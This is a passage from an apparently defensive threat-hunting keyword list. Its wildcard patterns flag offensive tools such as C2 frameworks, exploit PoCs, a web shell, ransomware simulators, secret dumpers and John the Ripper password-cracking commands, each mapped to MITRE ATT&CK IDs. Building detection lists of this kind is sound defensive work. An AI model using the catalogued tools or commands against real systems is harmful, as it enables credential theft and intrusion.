T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*its-a-feature/Mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*its-a-feature/Mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*itsKindred*,offensive_tool_keyword,Github Username,gthub username hosting malware samples and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/itsKindred,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ItsNee/Follina-CVE-2022-30190-POC*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*itunes_backup2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*itwasalladream -u * -p * -d *,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,0,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*itwasalladream*bogus.dll*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,0,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*ItWasAllADream-master*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,1,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*IUnknownObj.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*Ivy_1*_darwin_amd64*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*Ivy_1*_linux_amd64*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*Ivy_1*_windows_amd64.exe*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*Ivy-main.zip*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*iwork2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z 
-*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*jackdaw --*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,0,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*jackdaw.py*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*jackit --reset --debug*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*jajilbjjinjmgcibalaakngmkilboobh*,greyware_tool_keyword,Astar VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jas502n/bypassAV*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*jas502n/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*jatayu.php*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*jatayu-image.png*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*java -jar BeaconTool.jar*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*java/jndi/LDAPRefServer.java*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*java-deserialization-exploits*,offensive_tool_keyword,java-deserialization-exploits,A collection of curated Java Deserialization Exploits,T1029 - T1529 - T1569 - T1218,TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Coalfire-Research/java-deserialization-exploits,1,0,N/A,N/A,6,583,263,2021-05-16T23:10:49Z,2016-05-31T16:23:08Z -*javascript-obfuscator*,offensive_tool_keyword,javascript-obfuscator,JavaScript Obfuscator is a powerful free obfuscator for JavaScript. 
containing a variety of features which provide protection for your source code.,T1027,TA0010,N/A,N/A,Defense Evasion,https://github.com/javascript-obfuscator/javascript-obfuscator,1,0,N/A,N/A,10,11761,1384,2023-09-05T17:32:26Z,2016-05-09T08:16:53Z -*jbnmpdkcfkochpanomnkhnafobppmccn*,greyware_tool_keyword,apkfold free vpn,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jboss_jmx_upload_exploit*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*jdgilggpfmjpbodmhndmhojklgfdlhob*,greyware_tool_keyword,Browser VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jdk*-activator-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-call-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to 
identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-dgc-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-method-rce-test.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdk*-reg-bypass.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*jdwp-shellifier.py -t * -p * --cmd *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*jedieiamjmoflcknjdjhpieklepfglin*,greyware_tool_keyword,FastestVPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jedisct1*,offensive_tool_keyword,Github Username,github username. a knack for cryptography. computer vision. opensource software and infosec. hosting infosec tools used by pentester,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/jedisct1,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*jfjallid/go-secdump*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*jgbaghohigdbgbolncodkdlpenhcmcge*,greyware_tool_keyword,Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*JGillam/burp-co2*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*Jira-Lens.py*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation 
tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*jliodmnojccaloajphkingdnpljdhdok*,greyware_tool_keyword,Turbo VPN for PC,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jljopmgdobloagejpohpldgkiellmfnc*,greyware_tool_keyword,PP VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jmmcatee/cracklord*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*JMousqueton/PoC-CVE-2022-30190*,offensive_tool_keyword,POC,POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/JMousqueton/PoC-CVE-2022-30190,1,1,N/A,N/A,2,149,58,2022-06-05T21:06:13Z,2022-05-30T18:17:38Z -*jndi_injection.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*JNDI-Injection-Exploit*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*Job killed and console drained*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*JoelGMSec/EvilnoVNC*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,1,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*JoelGMSec/PSRansom*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,1,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*Joey is the best hacker in Hackers*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*john * --incremental*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john * -w=*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john * --wordlist=*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-groups*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *htdigest*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-inc *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-incremental *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-shells*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-show*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-single*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline 
password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-users*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *--wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --format=*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*john hashes*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john NTDS.dit*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --show *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
